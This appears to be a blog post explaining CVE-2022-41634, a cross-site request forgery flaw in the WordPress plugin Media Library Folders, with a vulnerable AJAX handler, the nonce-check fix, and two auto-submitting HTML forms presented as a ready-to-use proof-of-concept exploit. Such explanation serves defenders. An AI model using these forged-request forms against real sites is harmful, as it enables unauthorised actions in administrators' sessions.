CVE-2022-41634 is a serious vulnerability that affected the popular WordPress plugin *Media Library Folders*, up to version 7.1.1. This bug could let bad actors trick logged-in admins into performing unwanted actions, all without their knowledge. The type of security issue is known as a *Cross-Site Request Forgery* (CSRF). In this post, we’re going to break down what CSRF is, how it played out in this plugin, show code snippets, and talk about defending your site.
What is CSRF?
Imagine you’re an admin who’s already logged into your WordPress site. If someone gets you to click a malicious link on a different website, CSRF tricks your browser into making an action in WordPress as if you really meant to do it—like creating folders, deleting important files, or worse. The action “crosses” from a fake site into the “legitimate” admin session without checks. That’s the core of a CSRF attack.
About Media Library Folders
Media Library Folders is a plugin designed to help users organize WordPress media uploads. With over 100,000 active installs, it’s pretty popular.
How CVE-2022-41634 Works
The vulnerability was found in versions up to 7.1.1. The plugin’s code did not use proper security checks (WordPress *nonces*) in some of its AJAX functions. This meant a hacker could forge a POST request from another page, and if an admin visited it, the attacker could issue commands (like creating folders) with the admin’s power.
Technical Details
Where’s the problem?
The plugin used AJAX endpoints (admin-ajax.php) to handle file management. Several of these did not verify the request’s origin with a security nonce.
Let’s look at an example excerpt from a vulnerable code
// Hypothetical example from the plugin
add_action('wp_ajax_mlf_create_folder', 'mlf_create_folder');
function mlf_create_folder() {
// No check_ajax_referer or nonce validation!
$folder_name = $_POST['folder_name'];
// Code to create media folder
}
Without a nonce check on this endpoint, requests from anywhere would be accepted if the admin sends them, even from a hacker’s website.
What Could an Attacker Do?
Suppose the admin is browsing the web while logged into WordPress. The attacker gets the admin to visit a page containing this HTML:
<form action="https://victimsite.com/wp-admin/admin-ajax.php?action=mlf_create_folder"; method="POST" id="csrf_attack">
<input type="hidden" name="folder_name" value="pwned_by_attacker">
</form>
<script>
document.getElementById('csrf_attack').submit();
</script>
When the page loads, the form automatically submits. The browser, still authenticated, sends the request as if the admin meant it.
Result: The media folder “pwned_by_attacker” is created, without any admin approval!
Potential for more serious modifications depending on the AJAX endpoint's power.
- Could combine with other vulnerabilities for bigger attacks (exfiltrating files, deleting stuff, etc.).
Here’s a ready-to-use CSRF exploit for this bug
<!-- Replace the action URL with target site -->
<form action="https://target-site.com/wp-admin/admin-ajax.php?action=mlf_create_folder"; method="POST" id="csrf_poc">
<input type="hidden" name="folder_name" value="attacker_folder">
</form>
<script>
document.getElementById('csrf_poc').submit();
</script>
Any admin logged into the WordPress site who visits a page with this code can be exploited.
The plugin developer released a patch in version 7.2.. The update adds a nonce check like this
function mlf_create_folder() {
check_ajax_referer('mlf_nonce', 'security');
$folder_name = $_POST['folder_name'];
// Rest of the code...
}
This function forces requests to include a special token (*nonce*) that attackers can’t guess, blocking forgery.
References
- WPScan Advisory: CVE-2022-41634
- Plugin Changelog (Media Library Folders)
- WordFence Threat Intel
Stay safe, and keep your WordPress secure!
Have questions? Let me know in the comments, or check out the links above for the official advisories.
Timeline
Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/23/2022 18:05:00 UTC